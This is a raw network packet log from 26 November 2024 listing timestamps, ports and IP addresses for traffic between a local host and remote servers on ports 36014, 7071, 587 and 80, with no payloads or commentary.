Nov 26, 2024 09:01:30.212424040 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.212516069 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.212599039 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.212707996 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.212760925 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.212800980 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.212893963 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.212975979 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.213046074 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.331146955 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.331206083 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.331218958 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.331264973 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.331276894 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.331321001 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.723155022 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.772528887 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:30.892525911 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:31.227962971 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:31.278243065 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:31.621352911 CET	49741	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:31.741313934 CET	587	49741	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:31.741386890 CET	49741	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:31.980362892 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:31.984967947 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:32.105031013 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:33.099947929 CET	587	49741	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:33.100820065 CET	49741	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:33.220930099 CET	587	49741	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:33.518156052 CET	587	49741	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:33.518600941 CET	49741	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:33.638575077 CET	587	49741	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:33.936918974 CET	587	49741	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:33.937943935 CET	49741	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:34.027395010 CET	49717	80	192.168.2.5	193.122.6.168
Nov 26, 2024 09:01:34.057939053 CET	587	49741	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:34.147445917 CET	80	49717	193.122.6.168	192.168.2.5
Nov 26, 2024 09:01:34.363538980 CET	587	49741	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:34.363580942 CET	587	49741	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:34.363594055 CET	587	49741	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:34.363641977 CET	49741	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:34.384829044 CET	49741	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:34.459074974 CET	80	49717	193.122.6.168	192.168.2.5
Nov 26, 2024 09:01:34.461471081 CET	49748	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:34.504905939 CET	587	49741	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:34.528254032 CET	49717	80	192.168.2.5	193.122.6.168
Nov 26, 2024 09:01:34.583008051 CET	587	49748	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:34.583102942 CET	49748	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:34.804951906 CET	587	49741	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:34.807411909 CET	49741	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:34.927534103 CET	587	49741	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:35.225320101 CET	587	49741	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:35.227543116 CET	49741	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:35.347565889 CET	587	49741	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:35.644933939 CET	587	49741	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:35.645900011 CET	49741	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:35.765917063 CET	587	49741	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:36.042651892 CET	587	49748	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:36.042870998 CET	49748	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:36.070914984 CET	587	49741	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:36.071280956 CET	49741	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:36.162970066 CET	587	49748	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:36.191495895 CET	587	49741	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:36.249347925 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:36.369270086 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:36.452692032 CET	587	49748	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:36.453722000 CET	49748	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:36.488724947 CET	587	49741	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:36.489037037 CET	49741	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:36.573682070 CET	587	49748	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:36.609040976 CET	587	49741	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:36.864569902 CET	587	49748	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:36.865212917 CET	49748	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:36.910001993 CET	587	49741	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:36.910446882 CET	49741	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:36.985167027 CET	587	49748	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:37.030524969 CET	587	49741	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:37.180583000 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:37.231477976 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:37.286031008 CET	587	49748	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:37.286055088 CET	587	49748	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:37.286067009 CET	587	49748	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:37.286120892 CET	49748	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:37.287411928 CET	49748	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:37.327738047 CET	587	49741	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:37.334707022 CET	49741	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:37.334919930 CET	49741	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:37.335098982 CET	49741	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:37.335279942 CET	49741	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:37.407876015 CET	587	49748	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:37.454931021 CET	587	49741	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:37.455063105 CET	587	49741	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:37.455204010 CET	587	49741	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:37.455382109 CET	587	49741	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:37.526601076 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:37.646863937 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:37.699019909 CET	587	49748	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:37.699760914 CET	49748	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:37.817146063 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:37.817183971 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:37.817197084 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:37.817249060 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:37.817320108 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:37.817348003 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:37.817394018 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:37.819855928 CET	587	49748	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:37.840662956 CET	587	49741	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:37.934504032 CET	49741	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:38.109513998 CET	587	49748	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:38.231472015 CET	49748	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:38.261857033 CET	49748	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:38.381804943 CET	587	49748	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:38.388880968 CET	49741	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:38.499712944 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:38.508907080 CET	587	49741	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:38.620945930 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:38.672396898 CET	587	49748	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:38.672710896 CET	49748	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:38.793392897 CET	587	49748	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:38.806602955 CET	587	49741	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:38.807068110 CET	49741	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:38.807379007 CET	49762	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:38.928061008 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:38.928141117 CET	49762	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:39.086483002 CET	587	49748	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:39.086738110 CET	49748	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:39.206795931 CET	587	49748	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:39.497015953 CET	587	49748	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:39.497443914 CET	49748	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:39.522349119 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:39.530589104 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:39.617659092 CET	587	49748	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:39.650655985 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:39.893651009 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:39.896631956 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:39.911576033 CET	587	49748	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:39.911788940 CET	49748	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:39.936724901 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:40.017046928 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:40.028259039 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:40.032234907 CET	587	49748	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:40.346836090 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:40.424351931 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:40.424654007 CET	49762	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:40.544354916 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:40.544424057 CET	587	49748	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:40.544703960 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:40.544939995 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:40.545404911 CET	49748	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:40.545404911 CET	49748	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:40.545448065 CET	49748	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:40.545448065 CET	49748	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:40.545526981 CET	49748	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:40.569564104 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:40.666209936 CET	587	49748	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:40.666373014 CET	587	49748	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:40.666394949 CET	587	49748	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:40.666445971 CET	587	49748	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:40.666455984 CET	587	49748	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:40.672379017 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:40.674504995 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:40.689817905 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:40.838531017 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:40.858211040 CET	49762	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:40.957971096 CET	587	49748	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:40.979161024 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:41.122315884 CET	49748	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:41.272459984 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:41.272777081 CET	49762	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:41.392879009 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:41.413948059 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:41.414377928 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:41.423077106 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:41.495115042 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:41.543049097 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:41.692256927 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:41.692297935 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:41.692312002 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:41.692341089 CET	49762	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:41.695789099 CET	49762	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:41.763788939 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:41.812484026 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:41.815843105 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:41.884018898 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:41.932502031 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:42.054054022 CET	49717	80	192.168.2.5	193.122.6.168
Nov 26, 2024 09:01:42.115055084 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:42.115870953 CET	49762	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:42.174262047 CET	80	49717	193.122.6.168	192.168.2.5
Nov 26, 2024 09:01:42.236093998 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:42.469501019 CET	80	49717	193.122.6.168	192.168.2.5
Nov 26, 2024 09:01:42.470602036 CET	49748	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:42.529716969 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:42.531017065 CET	49762	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:42.581357002 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:42.583965063 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:42.590605974 CET	587	49748	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:42.622008085 CET	49717	80	192.168.2.5	193.122.6.168
Nov 26, 2024 09:01:42.651046991 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:42.704022884 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:42.881953001 CET	587	49748	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:42.882409096 CET	49748	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:42.882750988 CET	49769	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:42.947057962 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:42.947376966 CET	49762	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:43.002661943 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:43.002741098 CET	49769	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:43.047209024 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:43.067514896 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:43.100874901 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:43.167671919 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:43.220896959 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:43.231513023 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:43.368349075 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:43.368541002 CET	49762	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:43.488413095 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:43.511532068 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:43.563813925 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:43.683718920 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:43.782294035 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:43.789372921 CET	49762	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:43.909445047 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:44.075825930 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:44.137638092 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:44.198812008 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:44.206909895 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:44.207223892 CET	49762	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:44.307792902 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:44.308063030 CET	49769	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:44.319490910 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:44.319520950 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:44.319545984 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:44.319660902 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:44.319670916 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:44.319679976 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:44.319705009 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:44.319714069 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:44.319756031 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:44.319783926 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:44.319833040 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:44.319844961 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:44.327305079 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:44.428073883 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:44.439548016 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:44.439726114 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:44.544044018 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:44.620968103 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:44.624299049 CET	49762	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:44.624536037 CET	49762	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:44.624584913 CET	49762	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:44.624617100 CET	49762	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:44.625247002 CET	49762	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:44.625323057 CET	49762	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:44.625448942 CET	49762	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:44.625521898 CET	49762	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:44.625538111 CET	49762	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:44.625567913 CET	49762	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:44.660455942 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:44.725702047 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:44.725858927 CET	49769	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:44.735925913 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:44.744177103 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:44.744410992 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:44.744451046 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:44.744599104 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:44.745086908 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:44.745220900 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:44.745306969 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:44.745495081 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:44.745526075 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:44.745578051 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:44.777312994 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:44.845752954 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:44.897243023 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:44.899827957 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:44.923125029 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:44.931571960 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:45.042064905 CET	587	49762	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:45.043071985 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:45.051557064 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:45.137624979 CET	49762	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:45.143908024 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:45.145554066 CET	49769	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:45.266113997 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:45.322302103 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:45.328546047 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:45.337775946 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:45.413568020 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:45.458023071 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:45.533572912 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:45.568948984 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:45.568975925 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:45.568989992 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:45.570419073 CET	49769	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:45.570419073 CET	49769	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:45.690323114 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:45.988529921 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:45.989253044 CET	49769	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:46.012013912 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:46.050947905 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:46.109292984 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:46.170887947 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:46.406881094 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:46.406896114 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:46.440648079 CET	49769	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:46.443465948 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:46.465473890 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:46.560775042 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:46.586951971 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:46.637615919 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:46.774347067 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:46.858424902 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:46.858707905 CET	49769	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:46.894295931 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:46.979031086 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:47.279788017 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:47.280020952 CET	49769	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:47.400626898 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:47.697478056 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:47.697685957 CET	49769	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:47.770687103 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:47.771203041 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:47.772433043 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:47.777164936 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:47.817626953 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:47.892311096 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:47.897161007 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:48.119322062 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:48.123724937 CET	49769	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:48.125211000 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:48.127639055 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:48.140811920 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:48.143930912 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:48.243863106 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:48.247509956 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:48.264224052 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:48.541124105 CET	587	49769	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:48.541443110 CET	49769	587	192.168.2.5	51.195.88.199
